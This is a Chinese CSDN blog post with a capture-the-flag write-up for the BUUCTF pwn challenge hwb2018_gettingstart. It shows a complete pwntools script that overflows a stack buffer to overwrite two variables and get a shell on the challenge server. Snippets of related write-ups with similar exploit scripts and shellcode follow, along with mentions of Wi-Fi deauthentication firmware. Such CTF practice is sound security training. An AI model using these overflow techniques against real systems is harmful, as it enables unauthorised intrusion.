BUUCTF pwn hwb2018_gettingstart

最新推荐文章于 2022-04-30 19:36:51 发布
最新推荐文章于 2022-04-30 19:36:51 发布
阅读量679 收藏 1
点赞数 2
分类专栏: pwn安全 文章标签: python 安全 shell pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stareforever/article/details/113529460
版权

查看程序保护
在这里插入图片描述
IDA打开查看程序流
在这里插入图片描述
读入buf的内容会覆盖v7和v8的值,那么控制v7=0x7FFFFFFFFFFFFFFF和v8=0.1,即可获得shell

这里v8的二进制值可以直接在程序里找到
在这里插入图片描述
或者在网站http://www.binaryconvert.com/convert_double.html 输入0.1也可获得
在这里插入图片描述
完整ex

from pwn import *

context(log_level='debug')

#io=process("./task_gettingStart_ktQeERc")
io=remote("node3.buuoj.cn",29872)

io.recv()

v7=0x7FFFFFFFFFFFFFFF
v8=0x3FB999999999999A

payload=b'A'*0x18+p64(v7)+p64(v8)

io.send(payload)

io.recv()

io.interactive()
求是量子
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2018护网杯pwn题目task_gettingStart_ktQeERc的writeup
iqiqiya的博客
10-13 1292
下载后   本来想先用checksec 看看有啥保护 但是却发现执行不了(这里不太明白) 看到做出的人那么多  也就没有顾虑了 载入IDA   看到关键字符串  且有/bin/sh     双击进入    发现连续三个跳转之后   就是最终结果 直接F5看伪代码    看到read()之后    这不就是栈溢出嘛  覆盖v7 v8的数据达到条件即可获得shell 栈中顺序...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTFhwb2018_gettingstart】
weixin_51055545的博客
04-30 1049
想找一道高分题来做一做,想着会很难,但分析了IDA,才发现如此简单. 检查保护: 基本上全开了, IDA分析: 主函数中,满足这个条件就会直接get shell,直接覆盖即可, exp: from pwn import * elf = ELF('./task_gettingStart_ktQeERc') io = remote('node4.buuoj.cn',27594) #io = process('./task_gettingStart_ktQeERc') libc = elf.libc cont
护网杯_2018_gettingstart
z1r0的博客
02-01 1146
护网杯_2018_gettingstart 查看保护 v7=0x7fff。。。。v8=0.1时会拿到shell 而buf里面包含了v7和v8所以可以对v7和v8进行修改 v8在内在里面可以使用https://binaryconvert.com/result_double.html?decimal=04046049 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' d
[BUUCTF]PWN——护网杯_2018_gettingstart
mcmuyanga的博客
03-18 648
护网杯_2018_gettingstart 例行检查,64位程序,除了RELRO,其他全开 试运行一下,看看大概的情况 64位ida载入 当满足v5=0x7FFFFFFFFFFFFFFFLL并且v6=0.1的时候就能够获取shell,看一下栈布局 确定了偏移,可以在读入buf的时候修改v5和v6的值 这题没什么难度,v5的值可以直接表示,只是要注意一下0.1在内存中的表示。内存中存放的是数据的补码,浮点型数据的在内存中按照IEEE754 标准存储。有兴趣的师傅可以百度看看怎么算。这边在其他师傅的博
[BUUCTF-pwn] hwb2018_calendar
weixin_52640415的博客
02-04 303
我讨厌爆破,还是两次 堆地址+_IO_2_1_stdout_ 题目给了一个很明显的UAF void m3free() { int v0; // [rsp+Ch] [rbp-4h] v0 = readid(); if ( v0 != -1 ) free((void *)qword_202060[v0]); } 但是也有些限制,一是大小最大0x68,二是活动块只能建4个(这个无所谓,有俩用的就行) 另外edit里一个读入的函数有点坑,读入n+1个字符,n还不能为0,最少2个。这样
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWN.rar_PWN
最新发布
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
BUUCTF刷题7
m0_51251108的博客
11-09 345
题目:护网杯_2018_gettingstart:(浮点数内存表示)starctf_2019_babyshell:(有限制的shellcode)picoctf_2018_buffer overflow 0:[BSidesCF 2019]Runit:(shellcode)wdb_2018_3rd_soEasy:(栈迁移)suctf_2018_stack:(栈平衡) 护网杯_2018_gettingstart:(浮点数内存表示) 参考师傅:护网杯_2018_gettingstart(浮点数内存表示) · 语雀
buuoj Pwn writeup 216-220
yongbaoii的博客
08-31 467
216 hwb2018_gettingstart 溢出覆盖就好,唯一有个浮点数,网上网站一大把,找一个转换一下就好。 exp from pwn import * context(log_level='debug') r=remote("node4.buuoj.cn","25539") r.recv() v7=0x7FFFFFFFFFFFFFFF v8=0x3FB999999999999A payload='a'*0x18+p64(v7)+p64(v8) r.send(payload) r.
2018护网杯easy_tornado(BUUCTF提供复现)
giaogiao123的博客
01-31 1039
进入页面首先看一下flag.txt file?filename=/flag.txt&filehash=9f1a5c8c40be3aafbc5e719d151b1d36 换成fllllllllllllg试一试 出现error 然后一脸懵逼,查阅资料发现这是一个SSTI注入,原理跟SQL注入一样,但是上图把 又查阅资料发现尝试进行验证: 传递error?msg={{2}},页面出现2 传递er...
BUUCTF pwn qctf_2018_dice_game
热门推荐
stareforever的博客
12-25 3万+
查看保护 程序流程 输入name后 连续猜对50次随机数即可获得flag 输入buf的可以覆盖栈上的内容,那么输入0x50个字符就可以覆盖seed,最终产生的随机数就是定值了 考虑输入0x50个‘A’,那么写c程序 可以获得生成的随机数列表 3, 3, 2, 1, 5, 3, 4, 6, 3, 4, 2, 2, 3, 2, 1, 1, 4, 5, 4, 6, 3, 6, 4, 3, 4, 2, 2, 6, 1, 2, 2, 3, 4, 1, 2, 1, 4, 5, 4, 6, 6, 5, 1, 3,
pwn题bbctf_2020_fmt_me
stareforever的博客
12-21 2万+
BUUCTF pwn题bbctf_2020_fmt_me 题目流程 snprintf 格式化漏洞 用gdb查看第一个参数的内容即可观察 参数位置在bss 0x4040a0 偏移为6 那么依据题目的意思 可以将atoi 改为system_plt; 将system_got改为main返回再次输入/bin/sh获得shell 完整ex.py ...
XCTF 攻防世界 pwn CGfsb
stareforever的博客
12-22 2万+
XCTF 攻防世界 pwn CGfsb 题目流程 printf(&s) 明显的format string 漏洞 修改pwnme的值为8 完整的ex
BUUCTF pwn 鹏城杯_2018_code
stareforever的博客
12-28 2万+
查看保护 程序流程 先输入name,然后通过对输入的字符串进行检测,通过后进入到have_fun()函数 check_str()函数要求输入的字符串ascii码在[65,90],[97,122],即字符‘A’-‘Z’和’a’-’z’; 另一个函数要求如下结果 这里可以写相应的python代码进行爆破(时间太长,可以测试查看规律) 相应的结果如下 可以发现结果是递增的,并且 那么可以猜测进行测试 确定第一个为w,后面以从类推 那么输入‘wyBTs’即可成功通过检测 进入到have_fu
BUUCTF pwn 安洵杯_2018_neko
stareforever的博客
12-23 2万+
查看保护 PIE和canary都没开 IDA打开,查看程序流程 先输入’y’或’Y’进入play函数 read存在栈溢出漏洞,cancary保护没开,可以直接溢出 溢出距离为0xd0 程序有后门 但这没有效果 那么可以先把puts函数的地址打印出来,求得libc的基地址,然后再求相应的‘/bin/sh’地址,system地址源程序有提供,第二次溢出时就可以获得shell 完整ex ...
BUUCTF pwn Runit&&RunitPlusPlus
stareforever的博客
01-13 1万+
[BSidesCF 2019]Runit 查看保护 IDA查看程序流 读入buf并执行,那么可以写入shellcode 完整ex from pwn import * context(log_level='debug') #io=process("./runit") io=remote("node3.buuoj.cn",28430) io.recv() payload=asm(shellcraft.sh()) io.send(payload) io.interactive() [BSid
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值